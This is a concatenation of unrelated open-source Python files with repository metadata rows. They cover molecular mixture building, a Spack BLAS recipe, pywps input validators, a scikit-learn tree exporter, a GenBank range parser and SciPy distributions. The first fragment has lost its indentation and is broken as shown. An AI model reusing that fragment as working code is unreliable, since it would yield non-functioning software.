raise IOError('Error: It was not possible to create the OpenEye molecule object reading the file: %s' % self.gaff_mol2_filenames[i])
# Molecular weight
wgt = oechem.OECalculateMolecularWeight(mol) * grams/mole
if self.component_list[i].mole_fraction == 0.0:
delta_volume = oechem.OECalculateMolecularWeight(mol) * angstrom**3
sum_wgt_frac = sum_wgt_frac + wgt * self.component_list[i].mole_fraction
max_dist= max_dist_mol(mol)
if max_dist > max_dist_mols:
max_dist_mols = max_dist
cube_length = ((max_dist_mols + 2*cutoff)**3 + delta_volume)**(1.0/3.0)
n_monomers = []
# n_i = Volume * Density * mole_fraction_i/sum_j(wgt_j * mole_fraction_j)
self.n_monomers = [int(round(AVOGADRO_CONSTANT_NA * comp.mole_fraction * density * cube_length**3 / sum_wgt_frac)) \
if comp.mole_fraction !=0 else 1 for comp in self.component_list]
return self.n_monomers, cube_length
if not self.gaff_mol2_filenames:
raise ValueError('The list of gaff mol2 molecules is empty')
if self.n_monomers and self.mole_fractions:
raise ValueError('Error: For different compounds it is not possible to mix mole_fractions and number of molecules')
# The solution has been specified by using number of molecules
if self.n_monomers:
if self.filling_compound:
raise ValueError('Error: The filling compound cannot be mixed with components specified by defining the number of molecules')
size = openmoltools.packmol.approximate_volume_by_density(self.smile_strings, self.n_monomers)
packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], self.n_monomers, box_size = size)
self.labels = self.mix_fname[1:].split('_')
self.mix_fname = self.mix_fname[1:] + ''.join(['_'+str(i) for i in self.n_monomers])
self.pdb_filename = os.path.join(self.data_path_packmol, self.mix_fname+'.pdb')
packed_trj.save(self.pdb_filename)
# The solutions has been specified by using mole fractions
elif self.mole_fractions:
n_monomers, size = mole_fractions_to_n_monomers(self)
# WARNING: The size estimated with the mole_to_n_monomers function is underestimating
# the volume calculated by using openmoltools and for now we are using this estimate.
# Apparently Packmol is struggling to find convergence and introduces extra molecules
# into the found best solutionx (bug?)
size = openmoltools.packmol.approximate_volume_by_density(self.smile_strings, self.n_monomers)
packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], n_monomers, box_size = size)
#packed_trj = openmoltools.packmol.pack_box([md.load(mol2) for mol2 in self.gaff_mol2_filenames], n_monomers, box_size = size/anstrom)
self.labels = self.mix_fname[1:].split('_')
self.mix_fname = self.mix_fname[1:] +''.join(['_'+str(i) for i in self.mole_fractions if i is not None])
self.pdb_filename = os.path.join(self.data_path_packmol, self.mix_fname+'.pdb')
packed_trj.save(self.pdb_filename)
return
def convert_to_gromacs(self, solute_index):
"""From AMBER-format prmtop and crd files, generate final solvated GROMACS topology and coordinate files. Ensure that the desired "solute" (as per solute_index) has a single monomer treated via a unique residue name to allow treatment as a solute separate from other residues of the same name (if desired). The solute will be given residue name "solute" Also, check to see if there are "WAT" residues present, in which case tleap will have re-ordered them to the end of the data file. If so, update data structures accordingly and handle conversion appropriately.
Notes
-----
Currently, this function ensures that - after AMBER conversion reorders water molecules with residue names 'WAT' to occur last in the resulting parameter/coordinate files - the internal data structures are updated to have the correct order in the relevant lists (labels, smiles_strings, n_monomers). If for some reason GROMACS conversion were removed, these would need to be updated elsewhere. (Probably this should be done anyway, as this is not really a GROMACS issue.)
"""
# Read in AMBER format parameter/coordinate file and convert in gromacs
gromacs_topology = parmed.load_file(self.prmtop_filename, self.inpcrd_filename )
# Split the topology into components and check that we have the right number of components
components = gromacs_topology.split()
assert len(components)==len(self.n_monomers), "Number of monomers and number of components in the combined topology do not match."
#### HANDLE ORDERING OF WATER ####
# Check if any of the residues is named "WAT". If it is, antechamber will potentially have re-ordered it from where it was (it places residues named "WAT" at the end) so it may no longer appear in the order in which we expect.
resnames = [ components[i][0].residues[0].name for i in range(len(components)) ]
wat_present = False
# Manage presence of WAT residues and possible re-ordering
if 'WAT' in resnames:
# If there is a water present, then we MIGHT have re-ordering. Check smiles to find out where it was originally.
wat_orig_index = self.smile_strings.index('O')
# Where is it now?
wat_new_index = resnames.index('WAT')
# Reordered? If so, we have to adjust the ordering of n_monomers, smiles_strings, labels,
# and potentially solute_index. Filenames will be preserved since these were already created
if wat_orig_index != wat_new_index:
# tleap moves water to the end so if they aren't equal, we know where water will be...
self.n_monomers = self.n_monomers[0:wat_orig_index] + self.n_monomers[wat_orig_index+1:] + [self.n_monomers[wat_orig_index]]
self.smile_strings = self.smile_strings[0:wat_orig_index] + self.smile_strings[wat_orig_index+1:] + [self.smile_strings[wat_orig_index]]
self.labels = self.labels[0:wat_orig_index] + self.labels[wat_orig_index+1:] + [self.labels[wat_orig_index] ]
# Check solute_index and alter if needed
if not solute_index=='auto' and not solute_index==None:
# Index unchanged if it's before the water
if solute_index < wat_orig_index:
pass
# If it is the water, now it is at the end
elif solute_index == wat_orig_index:
solute_index = len(self.n_monomers)-1
# If it was after the water, then it moved up one position
else:
solute_index -= 1
#### END HANDLING OF ORDERING OF WATER ####
# Figure out what we're treating as the solute (if anything)
if solute_index=='auto':
# Check which of the molecules is present in qty 1
try:
solute_index = self.n_monomers.index(1)
except ValueError:
# If none is present in qty 1, then use the first
solute_index = 0
# Check that the passed solute index is correct
check_solute_indices = range(0,len(self.n_monomers))
assert solute_index in check_solute_indices and isinstance(solute_index, int) or solute_index == None, "Solute index must be an element of the list: %s or None. The value passed is: %s" % (check_solute_indices,self.solute_index)
# Now all we have to do is to change the name of the solute molecule (residue, in ParmEd) and ParmEd will automatically make it a new molecule on write.
# To do this, first build a list of the residue names we want, by molecule
resnames = [ ]
for i in range(len(self.n_monomers)):
# If this is not the solute, just keep what we had
if i!=solute_index:
resnames += [ self.labels[i] ] * self.n_monomers[i]
# If it is the solute, make the first residue be named solute and the rest what they were already
else:
resnames += [ 'solute' ] + [ self.labels[i]] * (self.n_monomers[i]-1)
# Make sure we didn't botch this
assert len(resnames) == len( gromacs_topology.residues ), "Must have the same number of residues named as defined in the topology file."
# Now we just go through and rename all the residues and we're done
for i in range(len(resnames)):
gromacs_topology.residues[i].name = resnames[i]
# Write GROMACS topology/coordinate files
gromacs_topology.save(self.top_filename, format='gromacs')
gromacs_topology.save(self.gro_filename)
return
# Create monomers and packmol directories
make_path(os.path.join(self.data_path_monomers))
make_path(os.path.join(self.data_path_packmol))
# Call the monomers creation and packmol systems
build_monomers(self)
build_boxes(self)
# Create amber files
if amber:
make_path(os.path.join(self.data_path_amber))
self.prmtop_filename = os.path.join(self.data_path_amber, self.mix_fname+'.prmtop')
self.inpcrd_filename = os.path.join(self.data_path_amber, self.mix_fname+'.inpcrd')
tleap_cmd = openmoltools.amber.build_mixture_prmtop(self.gaff_mol2_filenames, self.frcmod_filenames, self.pdb_filename, self.prmtop_filename, self.inpcrd_filename)
# Create gromacs files
if gromacs:
make_path(os.path.join(self.data_path_gromacs))
self.top_filename = os.path.join(self.data_path_gromacs, self.mix_fname+'.top')
self.gro_filename = os.path.join(self.data_path_gromacs, self.mix_fname+'.gro')
convert_to_gromacs(self,solute_index)
#*************************
# Component Class
#*************************
class Component(object):
"""
This Class is used to save the componet parameters
"""
def __init__(self, name=None, label=None, smile=None, numbers=None, mole_fraction=None):
"""
Initialization class function
Parameters
----------
name : str
the molecule name
label : str
the molecule label used to generates files
smile : str
the molecule smile string
numbers : int
the number of molecule
mole_fraction : float
molecular mole fraction
"""
# Checking name and label
ref_str = ''
if not name and not label:
raise ValueError("Error: No component parameters name or label has been provided for the component")
if label:
if not isinstance(label, str):
raise ValueError("Error: The component label %s is not a string" % label)
ref_str = label
if name:
if not isinstance(name, str):
raise ValueError("Error: The component name %s is not a string" % name)
ref_str = name
if label and not name:
print('\nWARNING: component name not provided label will be used as component name\n')
# Checking smile, molecule numbers and mole fraction
if smile:
if not isinstance(smile, str):
raise ValueError("Error: The smile % for the component %s is not a string" % (smile, ref_str))
#TO DO: Check if a string is a valid smile string
if numbers is not None:
if not isinstance(numbers, int):
raise ValueError("Error: The molecule numbers %s for the component %s is not an integer" % (numbers, ref_str))
if numbers < 1:
raise ValueError("Error: The molecule numbers %s for the component %s must be a positive integer" % (numbers, ref_str))
if mole_fraction:
if not isinstance(mole_fraction, float):
raise ValueError("Error: The mole fraction %s for the component %s is not a float number" % (mole_fraction, ref_str))
if mole_fraction < 0.0:
raise ValueError("Error: The mole fraction %s for the component %s must be positive" % (mole_fraction, ref_str))
if mole_fraction > 1.0:
raise ValueError("Error: The mole fraction %s for the component %s is greater than one" % (mole_fraction, ref_str))
if numbers and mole_fraction:
raise ValueError("Error: molecule numbers and mole fraction for the compound %s cannot be both specified" % ref_str)
if not smile:
mol = OEMol()
if name:
try:
OEParseIUPACName(mol, name)
smile = OECreateIsoSmiString(mol)
except:
raise ValueError("Error: The supplied name '%s' could not be parsed" % name)
elif label:
try:
OEParseIUPACName(mol, label)
smile = OECreateIsoSmiString(mol)
except:
raise ValueError("Error: The supplied label '%s' could not be parsed" % label)
self.name = name
self.label = label
self.smile = smile
self.numbers = numbers
self.mole_fraction = mole_fraction
return
def __str__(self):
"""
Printing object function
"""
return "\nname = %s\nlabel = %s\nsmile = %s\nnumbers = %s\nmole_frac = %s\n" \
%(self.name, self.label, self.smile, self.numbers, self.mole_fraction)
|
nividic/SolvationToolkit
|
solvationtoolkit/solvated_mixtures.py
|
Python
|
lgpl-2.1
| 30,218
|
[
"Amber",
"Gromacs",
"MDTraj",
"OpenMM"
] |
bc549487400c97e7bef19f03847e477c644705c4768f2efb9394850cd16966c3
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Cblas(Package):
"""The BLAS (Basic Linear Algebra Subprograms) are routines that
provide standard building blocks for performing basic vector and
matrix operations."""
homepage = "http://www.netlib.org/blas/_cblas/"
# tarball has no version, but on the date below, this MD5 was correct.
version('2015-06-06', sha256='0f6354fd67fabd909baf57ced2ef84e962db58fae126e4f41b21dd4fec60a2a3',
url='https://www.netlib.org/blas/blast-forum/cblas.tgz')
depends_on('blas')
parallel = False
def patch(self):
mf = FileFilter('Makefile.in')
mf.filter('^BLLIB =.*', 'BLLIB = {0}'.format(
' '.join(self.spec['blas'].libs.libraries)))
mf.filter('^CC =.*', 'CC = cc')
mf.filter('^FC =.*', 'FC = fc')
def install(self, spec, prefix):
make('all')
mkdirp(prefix.lib)
mkdirp(prefix.include)
# Rename the generated lib file to libcblas.a
install('lib/cblas_LINUX.a', prefix.lib.join('libcblas.a'))
install('include/cblas.h', prefix.include)
install('include/cblas_f77.h', prefix.include)
|
LLNL/spack
|
var/spack/repos/builtin/packages/cblas/package.py
|
Python
|
lgpl-2.1
| 1,360
|
[
"BLAST"
] |
641dec226b8f6fc2037a703984c23575c829513f14966aeb339fe184330afce9
|
##################################################################
# Copyright 2018 Open Source Geospatial Foundation and others #
# licensed under MIT, Please consult LICENSE.txt for details #
##################################################################
"""Validator classes are used for ComplexInputs, to validate the content
"""
import logging
from pywps.validator.mode import MODE
from pywps.inout.formats import FORMATS
import mimetypes
import os
LOGGER = logging.getLogger('PYWPS')
def validategml(data_input, mode):
"""GML validation function
:param data_input: :class:`ComplexInput`
:param pywps.validator.mode.MODE mode:
This function validates GML input based on given validation mode. Following
happens, if `mode` parameter is given:
`MODE.NONE`
it will return always `True`
`MODE.SIMPLE`
the mimetype will be checked
`MODE.STRICT`
`GDAL/OGR <http://gdal.org/>`_ is used for getting the proper format.
`MODE.VERYSTRICT`
the :class:`lxml.etree` is used along with given input `schema` and the
GML file is properly validated against given schema.
"""
LOGGER.info('validating GML; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GML.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
data_source = ogr.Open(data_input.file)
if data_source:
passed = (data_source.GetDriver().GetName() == "GML")
else:
passed = False
if mode >= MODE.VERYSTRICT:
from lxml import etree
from pywps._compat import PY2
if PY2:
from urllib2 import urlopen
else:
from urllib.request import urlopen
try:
schema_url = data_input.data_format.schema
gmlschema_doc = etree.parse(urlopen(schema_url))
gmlschema = etree.XMLSchema(gmlschema_doc)
passed = gmlschema.validate(etree.parse(data_input.stream))
except Exception as e:
LOGGER.warning(e)
passed = False
return passed
def validatejson(data_input, mode):
"""JSON validation function
:param data_input: :class:`ComplexInput`
:param pywps.validator.mode.MODE mode:
This function validates JSON input based on given validation mode. Following
happens, if `mode` parameter is given:
`MODE.NONE`
No validation, returns `True`.
`MODE.SIMPLE`
Returns `True` if the mime type is correct.
`MODE.STRICT`
Returns `True` if the content can be interpreted as a json object.
"""
LOGGER.info('validating JSON; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.JSON.mime_type}
if mode >= MODE.STRICT:
import json
try:
with open(data_input.file) as f:
json.load(f)
passed = True
except ValueError:
passed = False
return passed
def validategeojson(data_input, mode):
"""GeoJSON validation example
>>> import StringIO
>>> class FakeInput(object):
... json = open('point.geojson','w')
... json.write('''{"type":"Feature", "properties":{}, "geometry":{"type":"Point", "coordinates":[8.5781228542328, 22.87500500679]}, "crs":{"type":"name", "properties":{"name":"urn:ogc:def:crs:OGC:1.3:CRS84"}}}''') # noqa
... json.close()
... file = 'point.geojson'
>>> class fake_data_format(object):
... mimetype = 'application/geojson'
>>> fake_input = FakeInput()
>>> fake_input.data_format = fake_data_format()
>>> validategeojson(fake_input, MODE.SIMPLE)
True
"""
LOGGER.info('validating GeoJSON; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GEOJSON.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
data_source = ogr.Open(data_input.file)
if data_source:
passed = (data_source.GetDriver().GetName() == "GeoJSON")
else:
passed = False
if mode >= MODE.VERYSTRICT:
import jsonschema
import json
# this code comes from
# https://github.com/om-henners/GeoJSON_Validation/blob/master/geojsonvalidation/geojson_validation.py
schema_home = os.path.join(_get_schemas_home(), "geojson")
base_schema = os.path.join(schema_home, "geojson.json")
with open(base_schema) as fh:
geojson_base = json.load(fh)
with open(os.path.join(schema_home, "crs.json")) as fh:
crs_json = json.load(fh)
with open(os.path.join(schema_home, "bbox.json")) as fh:
bbox_json = json.load(fh)
with open(os.path.join(schema_home, "geometry.json")) as fh:
geometry_json = json.load(fh)
cached_json = {
"http://json-schema.org/geojson/crs.json": crs_json,
"http://json-schema.org/geojson/bbox.json": bbox_json,
"http://json-schema.org/geojson/geometry.json": geometry_json
}
resolver = jsonschema.RefResolver(
"http://json-schema.org/geojson/geojson.json",
geojson_base, store=cached_json)
validator = jsonschema.Draft4Validator(geojson_base, resolver=resolver)
try:
validator.validate(json.loads(data_input.stream.read()))
passed = True
except jsonschema.ValidationError:
passed = False
return passed
def validateshapefile(data_input, mode):
"""ESRI Shapefile validation example
"""
LOGGER.info('validating Shapefile; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.SHP.mime_type}
if mode >= MODE.STRICT:
from pywps.dependencies import ogr
import zipfile
z = zipfile.ZipFile(data_input.file)
shape_name = None
for name in z.namelist():
z.extract(name, data_input.tempdir)
if os.path.splitext(name)[1].lower() == '.shp':
shape_name = name
if shape_name:
data_source = ogr.Open(os.path.join(data_input.tempdir, shape_name))
if data_source:
passed = (data_source.GetDriver().GetName() == "ESRI Shapefile")
else:
passed = False
return passed
def validategeotiff(data_input, mode):
"""GeoTIFF validation example
"""
LOGGER.info('Validating Shapefile; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.GEOTIFF.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import gdal
data_source = gdal.Open(data_input.file)
passed = (data_source.GetDriver().ShortName == "GTiff")
except ImportError:
passed = False
return passed
def validatenetcdf(data_input, mode):
"""netCDF validation.
"""
LOGGER.info('Validating netCDF; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.file
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.NETCDF.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import netCDF4 as nc
nc.Dataset(data_input.file)
passed = True
except ImportError as e:
passed = False
LOGGER.exception("ImportError while validating netCDF4 file {}:\n {}".format(data_input.file, e))
except IOError as e:
passed = False
LOGGER.exception("IOError while validating netCDF4 file {}:\n {}".format(data_input.file, e))
return passed
def validatedods(data_input, mode):
"""OPeNDAP validation.
"""
LOGGER.info('Validating OPeNDAP; Mode: {}'.format(mode))
passed = False
if mode >= MODE.NONE:
passed = True
if mode >= MODE.SIMPLE:
name = data_input.url
(mtype, encoding) = mimetypes.guess_type(name, strict=False)
passed = data_input.data_format.mime_type in {mtype, FORMATS.DODS.mime_type}
if mode >= MODE.STRICT:
try:
from pywps.dependencies import netCDF4 as nc
nc.Dataset(data_input.url)
passed = True
except ImportError as e:
passed = False
LOGGER.exception("ImportError while validating OPeNDAP link {}:\n {}".format(data_input.url, e))
except IOError as e:
passed = False
LOGGER.exception("IOError while validating OPeNDAP link {}:\n {}".format(data_input.url, e))
return passed
def _get_schemas_home():
"""Get path to schemas directory
"""
schema_dir = os.path.join(
os.path.abspath(
os.path.dirname(__file__)
),
os.path.pardir,
"schemas")
LOGGER.debug('Schemas directory: {}'.format(schema_dir))
return schema_dir
if __name__ == "__main__":
import doctest
from pywps.wpsserver import temp_dir
with temp_dir() as tmp:
os.chdir(tmp)
doctest.testmod()
|
tomkralidis/pywps
|
pywps/validator/complexvalidator.py
|
Python
|
mit
| 10,267
|
[
"NetCDF"
] |
11f96e3c046eb673c161ee704a92cd97d56eda26cdee691df274931ff9004921
|
"""
This module defines export functions for decision trees.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Licence: BSD 3 clause
from warnings import warn
from ..externals import six
from . import _tree
def export_graphviz(decision_tree, out_file="tree.dot", feature_names=None,
max_depth=None, close=None):
"""Export a decision tree in DOT format.
This function generates a GraphViz representation of the decision tree,
which is then written into `out_file`. Once exported, graphical renderings
can be generated using, for example::
$ dot -Tps tree.dot -o tree.ps (PostScript format)
$ dot -Tpng tree.dot -o tree.png (PNG format)
Parameters
----------
decision_tree : decision tree classifier
The decision tree to be exported to GraphViz.
out_file : file object or string, optional (default="tree.dot")
Handle or name of the output file.
feature_names : list of strings, optional (default=None)
Names of each of the features.
max_depth : int, optional (default=None)
The maximum depth of the representation. If None, the tree is fully
generated.
Examples
--------
>>> import os
>>> from sklearn.datasets import load_iris
>>> from sklearn import tree
>>> clf = tree.DecisionTreeClassifier()
>>> iris = load_iris()
>>> clf = clf.fit(iris.data, iris.target)
>>> tree.export_graphviz(clf,
... out_file='tree.dot') # doctest: +SKIP
"""
if close is not None:
warn("The close parameter is deprecated as of version 0.14 "
"and will be removed in 0.16.", DeprecationWarning)
def node_to_str(tree, node_id):
value = tree.value[node_id]
if tree.n_outputs == 1:
value = value[0, :]
if isinstance(tree.splitter.criterion, _tree.Gini):
criterion = "gini"
elif isinstance(tree.splitter.criterion, _tree.Entropy):
criterion = "entropy"
elif isinstance(tree.splitter.criterion, _tree.MSE):
criterion = "mse"
else:
criterion = "impurity"
if tree.children_left[node_id] == _tree.TREE_LEAF:
return "%s = %.4f\\nsamples = %s\\nvalue = %s" \
% (criterion,
tree.impurity[node_id],
tree.n_node_samples[node_id],
value)
else:
if feature_names is not None:
feature = feature_names[tree.feature[node_id]]
else:
feature = "X[%s]" % tree.feature[node_id]
return "%s <= %.4f\\n%s = %s\\nsamples = %s" \
% (feature,
tree.threshold[node_id],
criterion,
tree.impurity[node_id],
tree.n_node_samples[node_id])
def recurse(tree, node_id, parent=None, depth=0):
if node_id == _tree.TREE_LEAF:
raise ValueError("Invalid node_id %s" % _tree.TREE_LEAF)
left_child = tree.children_left[node_id]
right_child = tree.children_right[node_id]
# Add node with description
if max_depth is None or depth <= max_depth:
out_file.write('%d [label="%s", shape="box"] ;\n' %
(node_id, node_to_str(tree, node_id)))
if parent is not None:
# Add edge to parent
out_file.write('%d -> %d ;\n' % (parent, node_id))
if left_child != _tree.TREE_LEAF:
recurse(tree, left_child, parent=node_id, depth=depth + 1)
recurse(tree, right_child, parent=node_id, depth=depth + 1)
else:
out_file.write('%d [label="(...)", shape="box"] ;\n' % node_id)
if parent is not None:
# Add edge to parent
out_file.write('%d -> %d ;\n' % (parent, node_id))
own_file = False
if isinstance(out_file, six.string_types):
if six.PY3:
out_file = open(out_file, "w", encoding="utf-8")
else:
out_file = open(out_file, "wb")
own_file = True
out_file.write("digraph Tree {\n")
if isinstance(decision_tree, _tree.Tree):
recurse(decision_tree, 0)
else:
recurse(decision_tree.tree_, 0)
out_file.write("}")
if own_file:
out_file.close()
|
depet/scikit-learn
|
sklearn/tree/export.py
|
Python
|
bsd-3-clause
| 4,623
|
[
"Brian"
] |
f329a8affbafbe85fdb707bb457c6e3291130c713d337740ade6ebb953ba1325
|
import warnings
class GenomeRanges(object):
"""
Split and manage a GenBank range string as converted by BioPython.
@param rangeStr: A C{str} indicating the (0-based) genome nucleotide
offsets covered by a protein. This can have the following example
forms:
[9462:10137](+)
[11969:12575](-)
join{[126386:126881](-), [125941:126232](+)}
join{[153005:153821](+), [82030:82618](-), [80480:81305](-)}
Note that this is the string as returned from BioPython SeqIO.parse
when it parses a GenBank flat file, not the string that is in such a
file. For that use the C{splitRange} function you can find in an
earlier version of this file (i.e., look in its git history).
@raise ValueError: If C{rangeStr} cannot be correctly parsed.
@return: A C{list} whose elements are 3-C{tuple}s holding the C{int} start
and stop offsets and a C{bool} that indicates whether the offsets
corresponds to the forward strand (i.e., will be C{True} when
there is a '(+)' in a range and C{False} when there is a '(-)' which
indicates the reverse strand).
Example arguments and their return values:
'[9462:10137](+)' => ((9462, 10137, True),)
'[11969:12575](-)' => ((11969, 12575, False),)
'join{[126386:126881](-), [125941:126232](+)}' =>
((126386, 126881, False),
(125941, 126232, True))
"""
def __init__(self, rangeStr):
if rangeStr.startswith('join{') and rangeStr[-1] == '}':
join = True
inner = rangeStr[5:-1]
else:
join = False
inner = rangeStr
ranges = []
subRanges = inner.split(', ')
nRanges = len(subRanges)
if nRanges == 1 and join:
raise ValueError('Could not parse GenBank range string "%s". '
'join{} can only be used with multiple ranges.' %
rangeStr)
elif nRanges > 1 and not join:
raise ValueError('Could not parse GenBank range string "%s". '
'Multiple ranges must be wrapped in join{}.' %
rangeStr)
for subRange in subRanges:
if subRange.endswith('](+)'):
forward = True
elif subRange.endswith('](-)'):
forward = False
else:
raise ValueError('Could not parse GenBank range string "%s". '
'Range "%s" does not end with ](+) or ](-).' %
(rangeStr, subRange))
if not subRange.startswith('['):
raise ValueError('Could not parse GenBank range string "%s". '
'Range "%s" does not start with "[".' %
(rangeStr, subRange))
try:
start, stop = subRange[1:-4].split(':')
except ValueError as e:
raise ValueError('Could not parse GenBank range string "%s". '
'Original parsing ValueError was "%s".' %
(rangeStr, e))
else:
if start.startswith('<'):
start = start[1:]
if stop.startswith('>'):
stop = stop[1:]
start, stop = map(int, (start, stop))
if start > stop:
raise ValueError(
'Could not parse GenBank range string "%s". '
'Offset values (%d, %d) cannot decrease.' %
(rangeStr, start, stop))
ranges.append((start, stop, forward))
self.ranges = self._mergeContiguousRanges(ranges)
self._nRanges = len(self.ranges)
def _mergeContiguousRanges(self, ranges):
"""
Merge ranges that are contiguous (follow each other immediately on the
genome).
@param ranges: An iterable of (start, stop, forward) tuples.
@return: A C{tuple} of (start, stop, forward) tuples with contiguous
ranges found in C{ranges} merged.
"""
result = []
lastStart = lastStop = lastForward = None
for index, (start, stop, forward) in enumerate(ranges):
if lastStart is None:
lastStart, lastStop, lastForward = start, stop, forward
else:
if start == lastStop and forward == lastForward:
# This range continues the previous one.
warnings.warn(
'Contiguous GenBank ranges detected: [%d:%d] '
'followed by [%d:%d].' %
(lastStart, lastStop, start, stop))
lastStop = stop
else:
# Emit the range that just got terminated.
result.append((lastStart, lastStop, lastForward))
# And remember this one.
lastStart, lastStop, lastForward = start, stop, forward
# Emit the final range.
result.append((lastStart, lastStop, lastForward))
return tuple(result)
def __str__(self):
return '<%s: %s>' % (
self.__class__.__name__, ', '.join(map(str, self.ranges)))
def circular(self, genomeLength):
"""
Determine whether the offset ranges of a protein in a genome span the
end of the genome (indicating that the genome may be circular).
@param genomeLength: The C{int} length of the genome.
@return: A C{bool}, C{True} if the ranges overlap the genome end.
"""
if self._nRanges == 1:
# If there is only one range, we simply return False even though it
# could be that the single range spans the whole genome. That is
# not the same as having two ranges, one of which ends at the end
# of the genome and the next starting at the start of the genome.
#
# I.e., a range tuples like this ((0, 100, False),) on a genome of
# length 100 will return False, whereas ((0, 75, False), (75, 100,
# False)) on a genome of length 100 will return True.
#
# The decision about whether you consider the degenerate case of
# ((0, 100, False),) to indicate circularity is a bit arbitrary.
# Here I've decided that it should not because I intend to use
# this function to decide whether to output multiple SAM lines
# for the match of a read against a reference. In this
# degenerate case just a single SAM line suffices, whereas in a
# non-degenerate case (such as ((0, 75, False), (75, 100, False))
# on a genome of length 100), a chimeric SAM alignment must be
# used, which requires quite different processing than a normal
# linear match. YMMV, and if you don't like it you can easily
# add an argument to this function that changes this behaviour
# (leaving the default to do what the code currently does).
return False
for index, (start, stop, _) in enumerate(self.ranges):
if stop == genomeLength:
return self.ranges[(index + 1) % self._nRanges][0] == 0
return False
def startInGenome(self, match):
"""
Calculate the position in the nucleotide genome where a DIAMOND match
begins.
@param match: A C{dict} with information about the DIAMOND match, as
returned by C{self._preprocessMatch}. Must contain a 'sstart' key
giving a 1-based C{int} offset of the start of the match in the
protein.
@return: The C{int} offset of the start of the DIAMOND match in the
genome.
"""
# Calculate the start of the match in the genome, given its start in
# the protein.
offsetInGenome = remaining = (match['sstart'] - 1) * 3
for start, stop, _ in self.ranges:
rangeWidth = stop - start
if remaining < rangeWidth:
# The match starts in this range.
return start + remaining
else:
remaining -= rangeWidth
else:
raise ValueError(
'Starting nucleotide offset %d not found in protein '
'nucleotide ranges %s.' %
(offsetInGenome,
', '.join(('(%d, %d)' % (i, j))
for i, j, _ in self.ranges)))
def orientations(self):
"""
Produce the set of all orientations for our ranges.
@return: A C{set} of C{True} and C{False} range orientations.
"""
return set(r[2] for r in self.ranges)
def distinctRangeCount(self, genomeLength):
"""
Determine the number of distinct ranges, given the genome length.
@param genomeLength: The C{int} length of the genome.
@return: An C{int} which is the number of ranges that are not
contiguous with one another.
"""
return len(self.ranges) - int(self.circular(genomeLength))
|
terrycojones/dark-matter
|
dark/genbank.py
|
Python
|
mit
| 9,316
|
[
"Biopython"
] |
cb93622f6eb03b014da707155b8d312088aa6a0ff6491139b284382c798e219f
|
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
import warnings
from scipy.special import comb
from scipy.misc.doccer import inherit_docstring_from
from scipy import special
from scipy import optimize
from scipy import integrate
from scipy.special import (gammaln as gamln, gamma as gam, boxcox, boxcox1p,
inv_boxcox, inv_boxcox1p)
from numpy import (where, arange, putmask, ravel, sum, shape,
log, sqrt, exp, arctanh, tan, sin, arcsin, arctan,
tanh, cos, cosh, sinh)
from numpy import polyval, place, extract, any, asarray, nan, inf, pi
import numpy as np
from . import vonmises_cython
from ._tukeylambda_stats import (tukeylambda_variance as _tlvar,
tukeylambda_kurtosis as _tlkurt)
from ._distn_infrastructure import (
rv_continuous, valarray, _skew, _kurtosis, _lazywhere,
_ncx2_log_pdf, _ncx2_pdf, _ncx2_cdf, get_distribution_names,
)
from ._constants import _XMIN, _EULER, _ZETA3
## Kolmogorov-Smirnov one-sided and two-sided test statistics
class ksone_gen(rv_continuous):
"""General Kolmogorov-Smirnov one-sided test.
%(default)s
"""
def _cdf(self, x, n):
return 1.0 - special.smirnov(n, x)
def _ppf(self, q, n):
return special.smirnovi(n, 1.0 - q)
ksone = ksone_gen(a=0.0, name='ksone')
class kstwobign_gen(rv_continuous):
"""Kolmogorov-Smirnov two-sided test for large N.
%(default)s
"""
def _cdf(self, x):
return 1.0 - special.kolmogorov(x)
def _sf(self, x):
return special.kolmogorov(x)
def _ppf(self, q):
return special.kolmogi(1.0-q)
kstwobign = kstwobign_gen(a=0.0, name='kstwobign')
## Normal distribution
# loc = mu, scale = std
# Keep these implementations out of the class definition so they can be reused
# by other distributions.
_norm_pdf_C = np.sqrt(2*pi)
_norm_pdf_logC = np.log(_norm_pdf_C)
def _norm_pdf(x):
return exp(-x**2/2.0) / _norm_pdf_C
def _norm_logpdf(x):
return -x**2 / 2.0 - _norm_pdf_logC
def _norm_cdf(x):
return special.ndtr(x)
def _norm_logcdf(x):
return special.log_ndtr(x)
def _norm_ppf(q):
return special.ndtri(q)
def _norm_sf(x):
